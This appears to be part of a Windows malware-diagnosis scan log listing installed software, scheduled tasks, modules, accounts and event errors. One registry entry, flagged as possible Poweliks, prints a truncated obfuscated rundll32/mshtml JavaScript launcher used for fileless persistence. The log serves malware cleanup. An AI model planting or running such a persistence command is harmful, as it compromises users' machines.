NVIDIA Performance (x32 Version: 6.5 - NVIDIA Corporation) Hidden
NVIDIA PhysX (HKLM-x32\...\{E10DB5DA-E576-40EA-A7FC-1CB2A7B283A6}) (Version: 9.09.1112 - NVIDIA Corporation)
NVMS7000 (HKLM-x32\...\{15174CE2-626C-4748-B2D2-E7B997E62745}) (Version: 2.00.00.50 - company)
OCX (HKLM-x32\...\OCX) (Version: 3.1.0.48 - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PhotoNow! 1.0 (HKLM-x32\...\{D36DD326-7280-11D8-97C8-000129760CBE}) (Version:  - )
PictureMover (HKLM-x32\...\{1896E712-2B3D-45eb-BCE9-542742A51032}) (Version: 3.3.1.19 - Hewlett-Packard Company)
PL-2303 USB-to-Serial (HKLM-x32\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.6.1 - Prolific Technology INC)
PowerRecover (x32 Version: 5.5.1931 - CyberLink Corp.) Hidden
PSE10 STI Installer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
PVSonyDll (Version: 1.00.0001 - NVIDIA Corporation) Hidden
QuickTime (HKLM-x32\...\{216AB108-2AE1-4130-B3D5-20B2C4C80F8F}) (Version: 7.60.92.0 - Apple Inc.)
RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition (HKLM-x32\...\RivaTuner) (Version: v2.24 MSI Master Overclocking Arena 2009 edition - Alexey Nicolaychuk)
Sansa Updater (HKCU\...\Sansa Updater) (Version:  - )
Sony DVD Architect Studio 4.5 (HKLM-x32\...\{B7C7A59F-CF70-481E-A94F-7C2563AA5ADD}) (Version: 4.5.107 - Sony)
Sony Sound Forge Audio Studio 9.0 (HKLM-x32\...\{20207CCE-A8FA-44A7-AA3D-1E43EB307B27}) (Version: 9.0.232 - Sony)
Spelling Dictionaries Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-5464-3428-900000000004}) (Version: 9.0.0 - Adobe Systems Incorporated)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Tera Term 4.75 (HKLM-x32\...\Tera Term_is1) (Version:  - )
TTLEditor 1.4 (HKLM-x32\...\{A1BFEB7F-3126-4F60-9CFD-8D4FC1B87BEB}_is1) (Version:  - LogMeTT.com)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2596620) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{A024FC7B-77DE-45DE-A058-1C049A17BFB3}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2687493) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6FAA03BD-2B51-4029-9AD9-64A3B8E3C84C}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISER_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767849) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{CB68A5B0-3508-4193-AEB9-AF636DAECE0F}) (Version:  - Microsoft)
Update for Microsoft Office 2007 suites (KB2767916) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{E9A82945-BA29-4EE8-8F2A-2F49545E9CF2}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM-x32\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISER_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM-x32\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISER_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM-x32\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISER_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM-x32\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISER_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2687404) 32-Bit Edition (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{ED38F8A3-4F61-494E-8BCA-E3AC7760C924}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM-x32\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISER_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB2850085) 32-Bit Edition (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{128A5449-CF71-4DA4-A746-F49E3B5DB584}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM-x32\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISER_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM-x32\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISER_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM-x32\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISER_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM-x32\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISER_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Vegas Movie Studio Platinum 9.0 (HKLM-x32\...\{97E038E1-41AD-4C93-BCDC-6A2394AEE352}) (Version: 9.0.92 - Sony)
Video Surveillance Client 2.0 (HKLM-x32\...\Video Surveillance Client_is1) (Version:  - )
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VueScan (HKLM-x32\...\VueScan) (Version:  - )
Windows Live Communications Platform (x32 Version: 14.0.8098.930 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite_Wave3) (Version: 14.0.8089.0726 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 14.0.8089.0726 - Microsoft Corporation) Hidden
Windows Live Sign-in Assistant (HKLM-x32\...\{45338B07-A236-4270-9A77-EBB4115517B5}) (Version: 5.000.818.5 - Microsoft Corporation)
Windows Live Upload Tool (HKLM-x32\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Movie Maker 2.6 (HKLM-x32\...\{B3DAF54F-DB25-4586-9EF1-96D24BB14088}) (Version: 2.6.4037.0 - Microsoft Corporation)
WinPcap 4.1.1 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.1753 - CACE Technologies)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-2804656215-4255892301-2232998820-1003_Classes\CLSID\{083f5ae0-2b0a-11dd-bd0b-0800200c9a66}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2804656215-4255892301-2232998820-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-10-17 21:59 - 00000698 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {173F9B60-3601-47D6-A216-2FC5B226644A} - System32\Tasks\CLMLSvc => c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe [2009-12-01] (CyberLink)
Task: {21B562EA-F6BD-44E5-ACD7-67A549B26314} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: {27B73950-ED39-459B-8513-61473ECF0DA6} - System32\Tasks\ROC_PAID_JAN2013_TB_rmv => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
Task: {3DE8C2ED-A926-427B-ADD3-9C69512F4A47} - System32\Tasks\Core Temp Autostart => C:\Program Files\Core Temp\Core Temp.exe [2010-07-02] ()
Task: {67BB9479-55B0-4DCD-B55E-B082105327B3} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: {6CAA594D-199B-4BCD-AFED-F64B3CED62BE} - System32\Tasks\DVDAgent => c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe [2009-10-20] (CyberLink Corp.)
Task: {81539C7F-8EF7-4D85-B187-D5DDD4F73AB4} - System32\Tasks\PCDRScheduledMaintenance => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe [2009-07-02] (PC-Doctor, Inc.)
Task: {89E48B7F-9C8D-4749-972D-7240241E609F} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
Task: {95C3FBE0-ED43-46ED-BBCD-64681B50E566} - System32\Tasks\AdobeAAMUpdater-1.0-Jim-PC-Jim => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2011-06-16] (Adobe Systems Incorporated)
Task: {A77CC17E-09E3-44BC-A51F-06BAB861194B} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {C5FA3822-ABC0-485E-9A77-2245EA38BDF1} - System32\Tasks\ROC_JAN2013_TB_rmv => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
Task: {E8A687B6-0CAF-4649-B886-2E3F16CD0204} - System32\Tasks\HPCeeScheduleForJP => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2010-09-13] (Hewlett-Packard)
Task: {EC3955D5-248E-465C-BD6B-AB1A8B32DC47} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: {F9AB9C66-47DF-4A85-A491-857127F0FD1D} - System32\Tasks\{3120572B-0A91-4C3D-9EA8-F374BB3519C2} => C:\Program Files (x86)\ImgBurn\ImgBurn.exe [2011-10-03] (LIGHTNING UK!)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\HPCeeScheduleForJP.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\PCDRScheduledMaintenance.job => C:\Program Files\PC-Doctor for Windows\pcdr5cuiw32.exe
Task: C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe
Task: C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job => C:\Program Files (x86)\AVG Secure Search\PostInstall\ROC.exe

==================== Loaded Modules (whitelisted) =============

2007-08-20 12:42 - 2007-08-20 12:42 - 01282048 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
2014-05-18 18:29 - 2013-03-02 12:03 - 02038784 _____ () C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
2009-12-03 18:24 - 2008-09-30 21:59 - 00192512 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
2014-05-18 18:29 - 2012-07-04 10:52 - 06562432 _____ () C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
2009-07-08 17:35 - 2009-07-08 17:35 - 00610360 _____ () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
2012-05-31 22:46 - 2012-02-18 14:17 - 00006144 _____ () C:\Users\JP\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V3.9.gadget\CoreTempReader.dll
2012-05-31 22:46 - 2012-02-18 14:17 - 00008704 _____ () C:\Users\JP\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V3.9.gadget\GetCoreTempInfoNET.dll
2012-05-31 22:46 - 2012-02-18 14:17 - 00007680 _____ () C:\Users\JP\AppData\Local\Microsoft\Windows Sidebar\Gadgets\All_CPU_Meter_V3.9.gadget\SystemInfo.dll
2012-02-18 14:17 - 2010-07-02 14:52 - 00530448 _____ () C:\Program Files\Core Temp\Core Temp.exe
2007-08-20 12:45 - 2007-08-20 12:45 - 01720320 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
2012-04-05 22:00 - 2012-04-05 22:00 - 00369152 _____ () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2006-09-08 14:32 - 2006-09-08 14:32 - 01720320 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtCore4.dll
2006-09-08 14:44 - 2006-09-08 14:44 - 02224128 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\Qt3Support4.dll
2006-09-08 14:41 - 2006-09-08 14:41 - 00409600 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtSql4.dll
2006-09-08 14:32 - 2006-09-08 14:32 - 00204800 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtXml4.dll
2006-09-08 14:40 - 2006-09-08 14:40 - 03969024 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtGui4.dll
2006-09-08 14:41 - 2006-09-08 14:41 - 00249856 _____ () C:\Program Files (x86)\Silicon Image\57xx SteelVine\QtNetwork4.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00047024 _____ () C:\Program Files (x86)\Single Video Surveillance Client\avcdec.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00446464 _____ () C:\Program Files (x86)\Single Video Surveillance Client\NETSDK.DLL
2014-05-18 18:29 - 2012-02-27 18:06 - 00032768 _____ () C:\Program Files (x86)\Single Video Surveillance Client\tmAudio.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00139337 _____ () C:\Program Files (x86)\Single Video Surveillance Client\hpr.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00782336 _____ () C:\Program Files (x86)\Single Video Surveillance Client\dhnetsdk.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00466944 _____ () C:\Program Files (x86)\Single Video Surveillance Client\dhplay.dll
2014-05-18 18:29 - 2012-02-27 18:05 - 00278528 _____ () C:\Program Files (x86)\Single Video Surveillance Client\dhdvr.dll
2014-05-18 18:29 - 2012-09-10 15:14 - 00212992 _____ () C:\Program Files (x86)\Single Video Surveillance Client\Inhot.dll
2014-05-18 18:29 - 2011-08-18 17:54 - 01409550 _____ () C:\Program Files (x86)\Single Video Surveillance Client\avcodec-53.dll
2014-05-18 18:29 - 2011-08-18 17:54 - 00100366 _____ () C:\Program Files (x86)\Single Video Surveillance Client\avutil-51.dll
2014-05-18 18:29 - 2011-08-18 17:54 - 00183310 _____ () C:\Program Files (x86)\Single Video Surveillance Client\swscale-2.dll
2014-05-18 18:29 - 2011-09-07 14:19 - 00475648 _____ () C:\Program Files (x86)\Single Video Surveillance Client\D3DVideoRender.dll
2014-05-18 18:29 - 2012-11-24 10:35 - 01236480 _____ () C:\Program Files (x86)\Single Video Surveillance Client\ants_codec.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00417792 _____ () C:\Program Files (x86)\Single Video Surveillance Client\zlplaysdk.dll
2014-05-18 18:29 - 2012-03-08 16:18 - 00544768 _____ () C:\Program Files (x86)\Single Video Surveillance Client\JBNVSDK.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00229376 _____ () C:\Program Files (x86)\Single Video Surveillance Client\HHNetClient.dll
2014-05-18 18:29 - 2012-11-19 10:32 - 00630784 _____ () C:\Program Files (x86)\Single Video Surveillance Client\TDHZNetSDK.dll
2014-05-18 18:29 - 2011-12-16 16:12 - 00053248 _____ () C:\Program Files (x86)\Single Video Surveillance Client\HISDK.dll
2014-05-18 18:29 - 2012-02-22 10:47 - 00155648 _____ () C:\Program Files (x86)\Single Video Surveillance Client\NetLib.dll
2014-05-18 18:29 - 2012-01-11 15:38 - 00798720 _____ () C:\Program Files (x86)\Single Video Surveillance Client\HIPlayer.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 01318912 _____ () C:\Program Files (x86)\Single Video Surveillance Client\LIBMYSQL.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00200704 _____ () C:\Program Files (x86)\Single Video Surveillance Client\Netplay_H264.dll
2014-05-18 18:29 - 2012-02-27 18:06 - 00069632 _____ () C:\Program Files (x86)\Single Video Surveillance Client\SoundOut_H264.dll
2014-05-18 18:29 - 2011-07-01 01:51 - 00544768 _____ () C:\Program Files (x86)\Single Video Surveillance Client\XM\NetSdk.dll
2014-10-17 22:42 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-10-17 22:42 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\DEC150.bpl
2010-07-07 20:33 - 2010-07-07 20:33 - 00002560 _____ () C:\Windows\SysWOW64\CTXFIRES.DLL
2009-12-01 20:49 - 2009-12-01 20:49 - 00931112 ____N () c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMediaLibrary.dll
2012-08-02 22:19 - 2009-06-29 10:54 - 00164864 _____ () C:\Windows\SysWOW64\APOMngr.DLL
2013-12-20 14:01 - 2013-12-20 14:01 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\44bfa824a3b8a6f789fda79a2e01a8db\IsdiInterop.ni.dll
2010-06-11 17:27 - 2010-03-03 20:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2014-10-17 22:42 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-10-17 22:42 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\sqlite3.dll
2014-10-17 22:42 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files (x86)\Spybot - Search & Destroy 2\av\BDSmartDB.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:56E2E879

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: GrooveMonitor => "C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe"
MSCONFIG\startupreg: NeroFilterCheck => C:\Windows\system32\NeroCheck.exe
MSCONFIG\startupreg: Share-to-Web Namespace Daemon => C:\Program Files (x86)\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe

========================= Accounts: ==========================

Administrator (S-1-5-21-2804656215-4255892301-2232998820-500 - Administrator - Disabled)
Guest (S-1-5-21-2804656215-4255892301-2232998820-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2804656215-4255892301-2232998820-1002 - Limited - Enabled)
JP (S-1-5-21-2804656215-4255892301-2232998820-1003 - Administrator - Enabled) => C:\Users\JP
JR (S-1-5-21-2804656215-4255892301-2232998820-1004 - Administrator - Enabled) => C:\Users\JR

==================== Faulty Device Manager Devices =============

Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (10/19/2014 01:49:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 01:18:53 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 01:16:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 01:11:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 00:59:25 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/19/2014 00:40:10 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.EXE, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.EXE0
Faulting application path: DAP.EXE1
Faulting module path: DAP.EXE2
Report Id: DAP.EXE3

Error: (10/19/2014 00:06:57 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program DAP.EXE version 10.0.6.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2f14

Start Time: 01cfeb591fccfce7

Termination Time: 23796

Application Path: C:\Program Files (x86)\DAP\DAP.EXE

Report Id: aea0ae3e-574d-11e4-b0bd-90e6baec3a60

Error: (10/18/2014 11:56:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/18/2014 11:53:02 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.exe, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.exe0
Faulting application path: DAP.exe1
Faulting module path: DAP.exe2
Report Id: DAP.exe3

Error: (10/18/2014 11:44:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: DAP.EXE, version: 10.0.6.0, time stamp: 0x00000000
Faulting module name: ntdll.dll, version: 6.1.7601.18229, time stamp: 0x51fb1072
Exception code: 0xc0150010
Fault offset: 0x0008482b
Faulting process id: 0x%9
Faulting application start time: 0xDAP.EXE0
Faulting application path: DAP.EXE1
Faulting module path: DAP.EXE2
Report Id: DAP.EXE3

System errors:
=============
Error: (10/20/2014 09:06:43 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Scanner Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (10/20/2014 09:06:37 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Spybot-S&D 2 Updating Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (10/20/2014 08:21:12 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/20/2014 08:20:08 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Spybot-S&D 2 Scanner Service service failed to start due to the following error:
%%1053

Error: (10/20/2014 08:20:08 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Spybot-S&D 2 Scanner Service service to connect.

Error: (10/19/2014 04:03:40 AM) (Source: Service Control Manager) (EventID: 7006) (User: )
Description: The ScRegSetValueExW call failed for FailureActions with the following error:
%%5

Error: (10/19/2014 03:03:32 AM) (Source: JRAID) (EventID: 15) (User: )
Description: The device, \Device\Scsi\JRAID1, is not ready for access yet.

Error: (10/19/2014 03:03:32 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Error: (10/19/2014 03:03:32 AM) (Source: JRAID) (EventID: 15) (User: )
Description: The device, \Device\Scsi\JRAID1, is not ready for access yet.

Error: (10/19/2014 03:03:29 AM) (Source: Disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.

Microsoft Office Sessions:
=========================
Error: (07/16/2014 00:45:15 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 49 seconds with 0 seconds of active time.  This session ended with a crash.

Error: (12/29/2013 06:21:22 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
